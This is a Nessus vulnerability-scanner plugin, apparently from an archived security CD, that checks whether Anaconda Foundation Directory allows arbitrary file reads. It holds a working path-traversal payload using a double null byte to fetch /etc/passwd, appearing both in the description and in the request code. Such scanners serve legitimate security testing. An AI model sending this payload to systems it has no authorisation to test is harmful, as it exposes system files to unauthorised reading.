home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / anaconda_doublenull.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  65 lines

  1. #
  2. # This script was written by Noam Rathaus
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(15749);
  10.  script_version("$Revision: 1.1 $");
  11.  
  12.  name["english"] = "Anaconda Double NULL Encoded Remote File Retrieval";
  13.  script_name(english:name["english"]);
  14.  
  15.  desc["english"] = "
  16. The remote Anaconda Foundation Directory contains a flaw
  17. that allows anyone to read arbitrary files with root (super-user) 
  18. privileges, by embedding a double null byte in a URL, as in :
  19.  
  20. http://www.example.com/cgi-bin/apexec.pl?etype=odp&template=../../../../../../..../../etc/passwd%%0000.html&passurl=/category/
  21.  
  22. Solution : Contact your vendor for updated software.
  23. Risk factor : High";
  24.  
  25.  script_description(english:desc["english"]);
  26.  
  27.  summary["english"] = "Anaconda Foundation Directory Double NULL Encoded Remote File Retrieval";
  28.  script_summary(english:summary["english"]);
  29.  
  30.  script_category(ACT_GATHER_INFO);
  31.  
  32.  
  33.  script_copyright(english:"This script is Copyright (C) 2004 Noam Rathaus");
  34.  family["english"] = "Remote file access";
  35.  family["francais"] = "AccΦs aux fichiers distants";
  36.  script_family(english:family["english"], francais:family["francais"]);
  37.  script_dependencie("find_service.nes", "http_version.nasl");
  38.  script_require_ports("Services/www", 80);
  39.  exit(0);
  40. }
  41.  
  42. #
  43. # The script code starts here
  44. #
  45. include("http_func.inc");
  46. include("http_keepalive.inc");
  47.  
  48.  
  49. port = get_http_port(default:80);
  50.  
  51. if(!get_port_state(port))exit(0);
  52.  
  53. foreach dir (make_list("/cgi-local", cgi_dirs()))
  54. {
  55.   item = string(dir,"/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%%0000.html&passurl=/category/");
  56.   buf = http_get(item:item, port:port);
  57.   rep = http_keepalive_send_recv(port:port, data:buf);
  58.   if( rep == NULL ) exit(0);
  59.   if(egrep(pattern:".*root:.*:0:[01]:.*", string:rep))
  60.       {
  61.       security_hole(port);
  62.     exit(0);
  63.     }
  64. }
  65.